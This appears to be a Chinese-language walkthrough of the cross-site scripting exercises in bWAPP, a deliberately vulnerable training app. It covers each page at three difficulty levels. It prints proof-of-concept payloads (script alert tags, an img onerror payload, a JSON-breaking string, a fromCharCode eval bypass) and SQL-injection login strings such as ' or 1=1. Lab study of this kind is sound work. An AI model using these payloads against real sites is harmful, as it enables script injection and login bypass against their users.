BWAPP A3 - Cross-Site Scripting(XSS)

1. XSS - Reflected (GET)

xss_get.php

1. low

http://129.211.9.195:10200/xss_get.php?firstname=&lastname=222&form=submit

2. medium

addslashes
在某些字符前加上了反斜线。这些字符是单引号(')、双引号(")、反斜线(\)与 NUL(NULL 字符)。
http://129.211.9.195:10200/xss_get.php?firstname=&lastname=222&form=submit

3. high

htmlspecialchars
// '&' (ampersand) becomes '&' 
// '"' (double quote) becomes '"' when ENT_NOQUOTES is not set
// "'" (single quote) becomes ''' (or ') only when ENT_QUOTES is set
// '<' (less than) becomes '<'
// '>' (greater than) becomes '>'


Welcome <script>alert(636)</script> 222

2. XSS - Reflected (POST)

xss_post.php

同 1. XSS - Reflected (GET)

3. XSS - Reflected (JSON)

xss_json.php

1. low

1"}]}';alert(636)//
1"}]}';

2. medium

htmlspecialchars

3. high

htmlspecialchars

4. XSS - Reflected (AJAX/JSON)

xss_ajax_2-1.php


01.png

1. low

2. medium

3. high

我们可以使用 JSON.parse () 方法将数据转换为 JavaScript 对象。

5. XSS - Reflected (AJAX/XML)

xss_ajax_1-1.php
HTML字符实体
了解 HTML 的转义作用

1. low

<img src=0 onerror="alert(1)">

2. medium

<img src=0 onerror="alert(1)">

3. high

htmlspecialchars

6. XSS - Reflected (Back Button)

xss_back_button.php

1. low

进入该页面,刷新一次
点击 Go back 按钮
修改 refer 为 '">
02.png

2. medium

addslashes过滤,无法绕过

3. high

htmlspecialchars过滤,无法绕过

7. XSS - Reflected (Custom Header)

xss_custom_header.php

1. low

bWAPP:

03.png

2. medium

addslashes过滤,无法绕过

3. high

htmlspecialchars过滤,无法绕过

8. XSS - Reflected (Eval)

xss_eval.php

1. low

alert(636)

2. medium

alert(636)

04.png

eval(String.fromCharCode(97,108,101,114,116,40,47,120,115,115,47,41))

3. high

htmlspecialchars过滤,无法绕过


05.png

9. XSS - Reflected (HREF)

xss_href-1.php

1. low

1

06.png

2. medium

urlencode ( string $str ) : string
将字符串编码并将其用于 URL 的请求部分,同时它还便于将变量传递给下一页。

3. high

urlencode ( string $str ) : string
将字符串编码并将其用于 URL 的请求部分,同时它还便于将变量传递给下一页。

10. XSS - Reflected (Login Form)

xss_login.php

1. low

login=' or 1=1,""&password=1&form=submit
login=' or 1=1' &password=1&form=submit

2. medium

addslashes

3. high

mysql_real_escape_string () 函数
转义 SQL 语句中使用的字符串中的特殊字符。下列字符受影响:
\x00、\n、\r、\、'、"、\x1a

11. phpMyAdmin BBCode Tag XSS

xss_phpmyadmin.php

1. low

2. medium

3. high

12. XSS - Reflected (PHP_SELF)

xss_php_self.php

1. low

firstname=&lastname=2333&form=submit

2. medium

firstname=&lastname=2333&form=submit

3. high

htmlspecialchars

13. XSS - Reflected (Referer)

xss_referer.php

1. low

Referer:

07.png
08.png

2. medium

3. high

14. XSS - Reflected (User-Agent)

xss_user_agent.php

1. low

09.png

2. medium

10.png

3. high

htmlspecialchars

15. XSS - Stored (Blog)

xss_stored_1.php
输出编码

1. low

2. medium


addslashes

3. high

htmlspecialchars

16. XSS - Stored (Change Secret)

xss_stored_3.php

1. low

2. medium

3. high

17. XSS - Stored (Cookies)

1. low

http://129.211.9.195:10200/xss_stored_2.php?genre=123&form=like
修改genre可直接修改cookie

2. medium

addslashes过滤输入的参数

3. high

不允许修改

18. SQLiteManager XSS

1. low

2. medium

3. high

19. XSS - Stored (User-Agent)

xss_stored_4.php
输入过滤

1. low

11.png

2. medium

11.png

3. high

htmlspecialchars过滤

你可能感兴趣的:(BWAPP A3 - Cross-Site Scripting(XSS))